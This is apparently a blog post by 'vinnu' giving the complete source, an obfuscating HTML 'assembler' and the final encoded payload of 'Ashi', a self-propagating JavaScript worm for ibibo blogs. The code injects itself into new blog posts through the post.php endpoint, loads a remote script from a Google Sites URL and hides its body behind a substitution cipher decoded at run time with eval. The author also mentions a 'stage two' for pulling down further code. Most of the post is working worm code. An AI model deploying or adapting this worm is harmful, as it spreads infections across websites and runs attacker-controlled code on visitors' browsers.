
prashant_uniyal

Demystifying The Ashi virus--"vinnu" PART III

Now I just need to scramble the code. For this purpose I created an HTML file containing the code, the encoder and the decoder. This file will assemble the virus and will provide us with the viral code. The HTML code is:
<html>
<head><title>Ashi assmebler by "vinnu"</title>
<script language=javascript>
var ashi='trigger();function trigger(){var
vin=document.getElementsByTagName(\"a\");var total=0;var index=0;var
address;for(var iter=0;iter<vin.length;iter++)
{if((index=vin[iter].href.indexOf(\"wp-admin\"))!=-1)
{address=vin[iter].href.substring(0,index+8)+\"/post.php\";blog(address);}}}functi
on blog(addr){var encodr=\"function y(x){var s=\\"\\",r=\\"\\";for(var
i=0;i<x.length;i++){s=x.charAt(i);if(s==\\"\\x51\\ "){s=\\"\\x25\\";}else
if(s==\\"\\x5A\\"){s=\\"\\x69\\";}else if(s==\\"\\x4A\\"){s=\\"\\x61\\";}else
if(s==\\"\\x46\\"){s=\\"\\x74\\";}else{s=x.charAt( i);}r+=s;}r=unescape(r);return
r;}\";var nunnu=\"><scr\"+\"ipt language=javascript\"+\"
src=\\"http://sites.google.com/site/cyberspecies/n/ibibo.js\\"></scr\"+\"ipt><a
href=\\"\\" onmouseover=javascript:eval(y(ashi));>jaijeya</a><a \";var
no=Math.floor(Math.random()*10);var quote=new Array(10);quote[0]=\"Sahdi bhasa
sahdi jaan...\";quote[1]=\"Dont you think we can...\";quote[2]=\"Thats the
attitude...Keep it up.\";quote[3]=\"Intelligent?..\";quote[4]=\"Main koi machine
thodi hai...\";quote[5]=\"jaijeya ji! Theek hainn na?...\";quote[6]=\"Veero!
Tusaan Eh bhi parhi leya\";quote[7]=\"Himachal a heaven...\";quote[8]=\"Free
Tibet...\";quote[9]=\"Paharhi!lovely language...\";var
blpayload=\"post_title=\"+quote[no];blpayload+=\"&content=jaijeya></p></div\";blpa
yload+=encodeURIComponent(\"><\"+\"sc\"+\"ript language=javascript>var
ashi=\'\"+ashi+\"\';eval(y(ashi));\"+encodr+\"<\"+ \"/sc\"+\"ript><a \");blpayload+
=encodeURIComponent(nunnu);blpayload+=\"hor&tags_i nput=&action=post-quickpresssave&
quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&s ave=Save
%20Draft&=Cancel&publish=Publish\";ajaxPSLV(addr,b lpayload);}function
ajaxPSLV(url,payload){var xmlhttp;if(window.XMLHttpRequest){xmlhttp=new
XMLHttpRequest();}else if(window.ActiveXObject){try{xmlhttp=new
ActiveXObject(\"Microsoft.XMLHTTP\");}catch(e){try {xmlhttp=new
ActiveXObject(\"Msxml2.XMLHTTP\");}catch(e){return ;}}}xmlhttp.open(\"POST\", url,
true);xmlhttp.setRequestHeader(\"Content-Type\",\"application/x-www-formurlencoded\");
xmlhttp.setRequestHeader(\"Contentlength\",
payload.length);xmlhttp.send(payload);}';
ashi = z(ashi);
var fuse = ';function y(x){var s=\"\",r=\"\";for(var i=0;i<x.length;i+
+){s=x.charAt(i);if(s==\"Q\"){s=\"%\";}else if(s==\"Z\"){s=\"i\";}else
if(s==\"J\"){s=\"a\";}else if(s==\"F\")
{s=\"t\";}else{s=x.charAt(i);}r+=s;}r=unescape(r); return
r; };eval(y(ashi));alert(\"Decoded and executed: \"+y(ashi));';
var assembledAshi = "javascript:var ashi='"+z(ashi)+"'"+fuse;
var vhtml = "<P><PRE>" + assembledAshi+"</PRE></P>";
// z(): the "scrambler" used by this assembler. It is escape() followed by a
// four-character substitution (% -> Q, i -> Z, a -> J, t -> F); y() below is
// the exact inverse. This is obfuscation, not encryption: a reviewer or a
// filter can recover the original text by applying the inverse map and
// unescape(). escape() is a deprecated, non-standard function. As posted, the
// listing is line-wrapped mid-token ("i+" / "+)" across the next two lines).
function z(x) {x=escape(x);var s="",r="";for(var i=0;i<x.length;i+
+){ s=x.charAt(i); if(s=="%"){s="Q";}else if(s=="i"){s="Z"}else if(s=="a")
{s="J";}else if(s=="t"){s="F";}else{s=x.charAt(i);}r+=s;}return r; }
// y(): inverse of z(); maps Q -> %, Z -> i, J -> a, F -> t and then
// unescape()s the result. The same routine is carried inside the assembled
// string (see "fuse" above) so the scrambled text can be decoded at run time
// before it is handed to eval(). A decoder shipped next to the encoded blob
// is the usual sign that a string is merely obfuscated, and the decoded form
// is what a filter or reviewer should inspect. "unes cape" on the third line
// is a line-wrapping artefact of the listing as posted.
function y(x) {var s="",r="";for(var i=0;i<x.length;i++)
{ s=x.charAt(i); if(s=="Q"){s="%";}else if(s=="Z"){s="i";}else if(s=="J")
{s="a";}else if(s=="F"){s="t";}else{s=x.charAt(i);}r+=s;}r=unes cape(r);return
r; }
</script>
</head>
<body>
<H1>The Ashi virus Assembler.</H1>
<HR>
<br>
<div id="viraldiv"><H3> love you nunnu</H3>
The viral Code:<BR><HR>
<script language=javascript>document.write(vhtml);</script>
<HR>
<div>
</body>
</html>

And the final assembled code is:
javascript:var
ashi='FrZggerQ28Q29Q3BfuncFZonQ20FrZggerQ28Q29Q7Bv JrQ20vZnQ3DdocumenF.geFElemenFsB
yTJgNJmeQ28Q22JQ22Q29Q3BvJrQ20FoFJlQ3D0Q3BvJrQ20Zn dexQ3D0Q3BvJrQ20JddressQ3BforQ28
vJrQ20ZFerQ3D0Q3BZFerQ3CvZn.lengFhQ3BZFer+
+Q29Q7BZfQ28Q28ZndexQ3DvZnQ5BZFerQ5D.href.ZndexOfQ 28Q22wp-JdmZnQ22Q29Q29Q21Q3D-
1Q29Q7BJddressQ3DvZnQ5BZFerQ5D.href.subsFrZngQ280Q 2CZndex+8Q29+Q22/posF.phpQ22Q3Bb
logQ28JddressQ29Q3BQ7DQ7DQ7DfuncFZonQ20blogQ28Jddr Q29Q7BvJrQ20encodrQ3DQ22funcFZon
Q20yQ28xQ29Q7BvJrQ20sQ3DQ5CQ22Q5CQ22Q2CrQ3DQ5CQ22Q 5CQ22Q3BforQ28vJrQ20ZQ3D0Q3BZQ3C
x.lengFhQ3BZ+
+Q29Q7BsQ3Dx.chJrAFQ28ZQ29Q3BZfQ28sQ3DQ3DQ5CQ22Q5C x51Q5CQ22Q29Q7BsQ3DQ5CQ22Q5Cx25Q
5CQ22Q3BQ7DelseQ20ZfQ28sQ3DQ3DQ5CQ22Q5Cx5AQ5CQ22Q2 9Q7BsQ3DQ5CQ22Q5Cx69Q5CQ22Q3BQ7D
elseQ20ZfQ28sQ3DQ3DQ5CQ22Q5Cx4AQ5CQ22Q29Q7BsQ3DQ5C Q22Q5Cx61Q5CQ22Q3BQ7DelseQ20ZfQ2
8sQ3DQ3DQ5CQ22Q5Cx46Q5CQ22Q29Q7BsQ3DQ5CQ22Q5Cx74Q5 CQ22Q3BQ7DelseQ7BsQ3Dx.chJrAFQ28
ZQ29Q3BQ7Dr+Q3DsQ3BQ7DrQ3DunescJpeQ28rQ29Q3BreFurn Q20rQ3BQ7DQ22Q3BvJrQ20nunnuQ3DQ2
2Q3EQ3CscrQ22+Q22ZpFQ20lJnguJgeQ3DjJvJscrZpFQ22+Q2 2Q20srcQ3DQ5CQ22hFFpQ3A//sZFes.g
oogle.com/sZFe/cyberspecZes/n/ZbZbo.jsQ5CQ22Q3EQ3C/scrQ22+Q22ZpFQ3EQ3CJQ20hrefQ3DQ
5CQ22Q5CQ22Q20onmouseoverQ3DjJvJscrZpFQ3AevJlQ28yQ 28JshZQ29Q29Q3BQ3EjJZjeyJQ3C/JQ3
EQ3CJQ20Q22Q3BvJrQ20noQ3DMJFh.floorQ28MJFh.rJndomQ 28Q29*10Q29Q3BvJrQ20quoFeQ3DnewQ
20ArrJyQ2810Q29Q3BquoFeQ5B0Q5DQ3DQ22SJhdZQ20bhJsJQ 20sJhdZQ20jJJn...Q22Q3BquoFeQ5B1
Q5DQ3DQ22DonFQ20youQ20FhZnkQ20weQ20cJn...Q22Q3Bquo FeQ5B2Q5DQ3DQ22ThJFsQ20FheQ20JFF
ZFude...KeepQ20ZFQ20up.Q22Q3BquoFeQ5B3Q5DQ3DQ22InF ellZgenFQ3F..Q22Q3BquoFeQ5B4Q5DQ
3DQ22MJZnQ20koZQ20mJchZneQ20FhodZQ20hJZ...Q22Q3Bqu oFeQ5B5Q5DQ3DQ22jJZjeyJQ20jZQ21Q
20TheekQ20hJZnnQ20nJQ3F...Q22Q3BquoFeQ5B6Q5DQ3DQ22 VeeroQ21Q20TusJJnQ20EhQ20bhZQ20p
JrhZQ20leyJQ22Q3BquoFeQ5B7Q5DQ3DQ22HZmJchJlQ20JQ20 heJven...Q22Q3BquoFeQ5B8Q5DQ3DQ2
2FreeQ20TZbeF...Q22Q3BquoFeQ5B9Q5DQ3DQ22PJhJrhZQ21 lovelyQ20lJnguJge...Q22Q3BvJrQ20
blpJyloJdQ3DQ22posF_FZFleQ3DQ22+quoFeQ5BnoQ5DQ3Bbl pJyloJd+Q3DQ22Q26conFenFQ3DjJZje
yJQ3EQ3C/pQ3EQ3C/dZvQ22Q3BblpJyloJd+Q3DencodeURIComponenFQ28Q22Q3EQ 3CQ22+Q22scQ22+
Q22rZpFQ20lJnguJgeQ3DjJvJscrZpFQ3EvJrQ20JshZQ3DQ27 Q22+JshZ+Q22Q27Q3BevJlQ28yQ28Jsh
ZQ29Q29Q3BQ22+encodr+Q22Q3CQ22+Q22/scQ22+Q22rZpFQ3EQ3CJQ20Q22Q29Q3BblpJyloJd+Q3Den
codeURIComponenFQ28nunnuQ29Q3BblpJyloJd+Q3DQ22horQ 26FJgs_ZnpuFQ3DQ26JcFZonQ3DposFquZckpresssJveQ26qu Zckpress_
posF_IDQ3D0Q26_wpnonceQ3DQ26_wp_hFFp_refererQ3DQ26 sJveQ3DSJveQ25
20DrJfFQ26Q3DCJncelQ26publZshQ3DPublZshQ22Q3BJjJxP SLVQ28JddrQ2CblpJyloJdQ29Q3BQ7Df
uncFZonQ20JjJxPSLVQ28urlQ2CpJyloJdQ29Q7BvJrQ20xmlh FFpQ3BZfQ28wZndow.XMLHFFpRequesF
Q29Q7BxmlhFFpQ3DnewQ20XMLHFFpRequesFQ28Q29Q3BQ7Del seQ20ZfQ28wZndow.AcFZveXObjecFQ2
9Q7BFryQ7BxmlhFFpQ3DnewQ20AcFZveXObjecFQ28Q22MZcro sofF.XMLHTTPQ22Q29Q3BQ7DcJFchQ28
eQ29Q7BFryQ7BxmlhFFpQ3DnewQ20AcFZveXObjecFQ28Q22Ms xml2.XMLHTTPQ22Q29Q3BQ7DcJFchQ28
eQ29Q7BreFurnQ3BQ7DQ7DQ7DxmlhFFp.openQ28Q22POSTQ22 Q2CQ20urlQ2CQ20FrueQ29Q3BxmlhFFp
.seFRequesFHeJderQ28Q22ConFenF-TypeQ22Q2CQ22JpplZcJFZon/x-www-formurlencodedQ22Q29Q3BxmlhFFp.
seFRequesFHeJderQ28Q22ConFenFlengFhQ22Q2CpJyloJd.
lengFhQ29Q3BxmlhFFp.sendQ28pJyloJdQ29Q3BQ7D';funct ion y(x){var
s="",r="";for(var i=0;i<x.length;i++){s=x.charAt(i);if(s=="Q"){s="%" ;}else
if(s=="Z"){s="i";}else if(s=="J"){s="a";}else if(s=="F")
{s="t";}else{s=x.charAt(i);}r+=s;}r=unescape(r);re turn
r; };eval(y(ashi));alert("Decoded and executed: "+y(ashi));

The last alert has been added to the above viral code to make sure that the virus is properly triggered. It is not a part of the virus and will not be replicated. And that's it: the "Ashi" virus..."vinnu". I have informed ibibo about this virus.
This virus is a very good example of artificial living organisms helping each other to survive. For example, they have now stopped new blog posts from being submitted, but they haven't yet removed the infection and the virus is still on the blogs. And this virus also has a stage two available for retrieval of the code. So it can either be upgraded to exploit other vulnerabilities or be used to download another virus to already infected blogs and keep the infection one step ahead of the developers' reach...."vinnu"
Thanx a lot..."vinnu"